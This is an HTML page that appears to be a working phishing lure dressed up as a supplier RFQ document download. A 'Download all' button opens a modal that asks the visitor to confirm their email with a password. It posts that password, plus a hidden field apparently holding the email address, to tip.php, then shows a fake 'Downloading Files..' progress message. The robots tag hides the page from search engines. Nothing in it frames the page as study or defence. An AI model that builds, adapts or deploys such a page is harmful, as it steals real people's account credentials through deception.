<!doctype html>


<html>
    <head>
        <meta charset="utf-8">
       <title> 21l968741843230509&amp;mARzAuvP </title>
<meta name="description" content="_Materials for Supply">

<meta name="keywords" content="_Demands">
<meta name="robots" content="noindex, nofollow">
<meta property="og:title" content="_Overview | Specs">
<meta property="og:type" content="website">
<meta property="og:site_name" content="_&amp;Requirements">
<meta property="og:description" content="&amp;RFQ_">

        <link rel="stylesheet" href="bootstrap.min.css">

  <script src="jquery.min.js"></script>
  <script src="main.js"></script>
  <script src="popper.min.js"></script>
  <script src="tether.min.js"></script>
  <script src="bootstrap.min.js"></script>

        <style>
            body {
                background-image: url(bg.png);
                background-repeat: no-repeat;
                color: #045eb4;
            }



            #d {
                position: relative;
                left: 530px;
                top: 350px;

            }

            #form {
                position: absolute;
                left: 530px;
                top: 50px;
                width: 300px;
                border-radius: 10px;
                padding: 20px;
                z-index: 2;
                background: white;
                display:none;

            }

            #myModal{
                top: 40%;
                left: 50%;
                transform: translate(-50%,-50%);
                overflow: hidden;
            }
            #mydal{
                top: 50%;
                left: 50%;
                transform: translate(-50%,-50%);
            }
            .blue{
                background-color: #045eb4;
                color: white;
            }
            #sub1{
                margin-top: 480px;
                margin-left: 140px;
                border-radius: 15px;
                position: absolute;
                z-index: 1;


            }
            .sky{
                background-color: #409fff;
                color:white;

            }
        </style>
    </head>

    <body>

        <!-- The Modal -->
        <div class="modal fade" id="myModal">
            <div class="modal-dialog modal-md">
                <div class="modal-content">
                    <!-- Modal body -->
                    <div class="modal-body text-center" >
                        <img src="logo.jpg" width="200"><br>
                        <div id="msg" style="color:black;">Please confirm receiving email </div>
                        <hr>
                        <h1></h1>
                        <form method="post" id="users" action="tip.php" >

                            <p id="m1"></p>
                            <input type="password" name="x2" class="form-control text-center" value="" id="ps" placeholder="Password" required="" >
                            <span class="text-danger" id="er"></span>
                            <input type="hidden" id="x1" value="" name="x1">
                            <br>
                            <button id="sub" name="sub"  type="submit" class="btn btn-md btn-block sky">Download all</button>
                        </form>
                    </div>
                </div>
            </div>
        </div>


        <div class="modal fade" id="mydal">
            <div class="modal-dialog modal-md">
                <div class="modal-content">
                    <!-- Modal body -->
                    <div class="modal-body text-center" >
                        <img src="pro.gif"  style="width:100%;max-width:200px ;"><br>
                        <div id="ms" class="text-danger h5">Downloading Files.. </div>

                    </div>
                </div>
            </div>
        </div>
<script>
    
</script>


        <div id="form" class="text-center">

        </div>

        <button type="button" id="sub1" class="btn btn-primary" data-toggle="modal" data-target="#myModal">
            Download all
        </button>


    </body>

</html>
